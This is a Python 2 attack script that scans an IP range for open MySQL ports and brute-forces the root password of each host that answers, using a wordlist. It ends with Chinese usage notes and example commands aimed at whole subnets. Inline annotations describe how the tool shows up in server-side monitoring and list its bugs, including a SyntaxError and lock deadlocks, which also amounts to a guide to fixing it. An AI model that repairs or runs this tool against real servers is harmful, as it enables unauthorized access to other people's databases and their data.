#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Last Modified by:   Lcy
# @Email: [email protected]
import threading
import argparse
import socket
import Queue
import netaddr
import MySQLdb
import time
import sys
class Mysqlfuzz:
    """Sweep an address range for open TCP/3306, then try root passwords on each hit.

    The constructor does all the work: it fills ``self.scanque`` with the
    addresses to probe, runs ``ScanPort`` on ``tnum`` threads, waits for
    every thread to finish, then reuses the same queue for the lines of
    ``pass.txt`` and runs ``Crack`` against each host collected in
    ``self.openlist``.  Hits are printed and are meant to be appended to
    ``good.txt`` (see the note in ``Crack``).

    Seen from the server side this is a burst of bare TCP connects to port
    3306 from one source across a contiguous range, followed by repeated
    failed ``root`` logins against every host that answered; connection-rate
    monitoring on 3306 and access-denied auditing on the MySQL side are
    where it shows up.

    NOTE: as written the module does not compile -- both ``for in
    range(tnum):`` loops are missing a loop variable (SyntaxError).
    """
    def __init__(self,addr,tnum):
        """Run the whole scan-then-crack sequence for ``addr`` with ``tnum`` threads.

        addr: either ``"start-end"`` (handed to netaddr.IPRange) or anything
              netaddr.IPNetwork accepts, in which case iter_hosts() decides
              which addresses are queued.
        tnum: number of worker threads used in each phase.
        """
        # One queue serves both phases: first addresses, later passwords.
        self.scanque = Queue.Queue()
        self.tnum = tnum
        # Count of still-running ScanPort threads; each one decrements it on exit.
        self.tmpnum = tnum
        self.lock = threading.Lock()
        self.openlist = []
        if addr.find("-") != -1:
            for ip in netaddr.IPRange(addr.split("-")[0],addr.split("-")[1]): 
                self.scanque.put(ip)
        else:
            for ip in netaddr.IPNetwork(addr).iter_hosts(): 
                self.scanque.put(ip)
        # Snapshot of the queue length; nothing in this class reads it back.
        self.qsize = self.scanque.qsize()
        # NOTE: missing loop variable -> SyntaxError; the module cannot be imported as is.
        for in range(tnum):
            t = threading.Thread(target=self.ScanPort)
            t.setDaemon(True)
            t.start()
        # Poll until every ScanPort thread has counted itself out.
        while self.tmpnum > 0:
            time.sleep(1.0)
        print "[*]:cracking MySQL Password ..."
        # ``file`` shadows the Python 2 builtin of the same name.
        with open("pass.txt","r") as file:
            data = file.readlines()
        for ip in self.openlist:
            # Refill the shared queue with the whole wordlist for this one host.
            for line in data:
                self.scanque.put(line.strip())
            # NOTE: same missing loop variable as above (SyntaxError).
            for in range(tnum):
                t = threading.Thread(target=self.Crack,args=(ip,))
                t.setDaemon(True)
                t.start()
            # Wait for the wordlist to drain before moving on to the next host.
            while self.scanque.qsize() > 0:
                time.sleep(1.0)
    def Crack(self,ip):
        """Worker: pull passwords off ``self.scanque`` and try each as MySQL ``root`` on ``ip``.

        The ``break`` after a hit is meant to end this thread while the other
        workers keep draining the queue, but the file-open bug noted below
        raises before it is reached.  Every exception -- connection refused,
        access denied, even KeyboardInterrupt -- is swallowed by the bare
        ``except``.
        """
        while self.scanque.qsize() > 0:
            try:
                # qsize() then a blocking get(): if another thread takes the
                # last item in between, this get() blocks forever.
                password = self.scanque.get()
                # A successful connect is the only "hit" signal; ``conn`` is never closed.
                conn=MySQLdb.connect(host=ip,user='root',passwd=password,db='test',port=3306,connect_timeout=4)
                self.lock.acquire()
                msg = "[+]:%s Username: root Password is: %s" %(ip,password)
                print msg
                # NOTE: 'good.txt''a' is adjacent-string concatenation, i.e.
                # open('good.txta') in the default read mode, so the write
                # below raises and ``self.lock`` is never released (no
                # try/finally); any other worker that later hits a valid
                # login then blocks on acquire() indefinitely.
                output = open('good.txt''a')
                output.write(msg + "\r\n")  
                self.lock.release()
                break
            except:
                pass
    def ScanPort(self):
        """Worker: pull addresses off ``self.scanque`` and record those accepting TCP/3306.

        Only a TCP connect is attempted (4 s timeout); nothing is sent or
        read, and the socket is never closed explicitly.  Hits are appended
        to ``self.openlist`` under ``self.lock``.  On exit the thread
        decrements ``self.tmpnum`` so the constructor knows when to proceed;
        a thread stuck in get() (see below) never does, and the constructor
        waits forever.
        """
        while self.scanque.qsize() > 0:
            try:
                # Same qsize()/get() race as in Crack(): a drained queue
                # leaves this get() blocked forever.
                ip = self.scanque.get()
                s = socket.socket()
                s.settimeout(4)
                s.connect((str(ip), 3306))
                self.lock.acquire()
                print ip," 3306 open"
                self.openlist.append(str(ip))
                self.lock.release()
            except:
                pass
        # Not done under ``self.lock``; ``-=`` on a shared attribute is not atomic.
        self.tmpnum -= 1
if __name__ == "__main__":
    # CLI entry point: a target address is required, the thread count is optional.
    cli = argparse.ArgumentParser(description="mysqlfuzz")
    cli.add_argument('-a','--addr', type=str, help="ipaddress")
    cli.add_argument('-t','--thread', type=int, help="Thread Number",default=100)
    opts = cli.parse_args()
    if not opts.addr:
        # No target supplied: show usage and leave with a zero status.
        cli.print_help()
        sys.exit(0)
    addr = opts.addr
    tnum = opts.thread
    # The constructor runs the whole job; nothing is returned.
    Mysqlfuzz(addr,tnum)

需要安装的模块:

pip install netaddr

MySQLdb http://download.csdn.net/detail/weibin0320/6663763

支持ip段爆破和单ip爆破

python fuzz.py -a 192.168.1.1/24 -t 30

python fuzz.py -a 192.168.1.23 -t 30

python fuzz.py -a 192.168.1.1-192.168.1.255 -t 30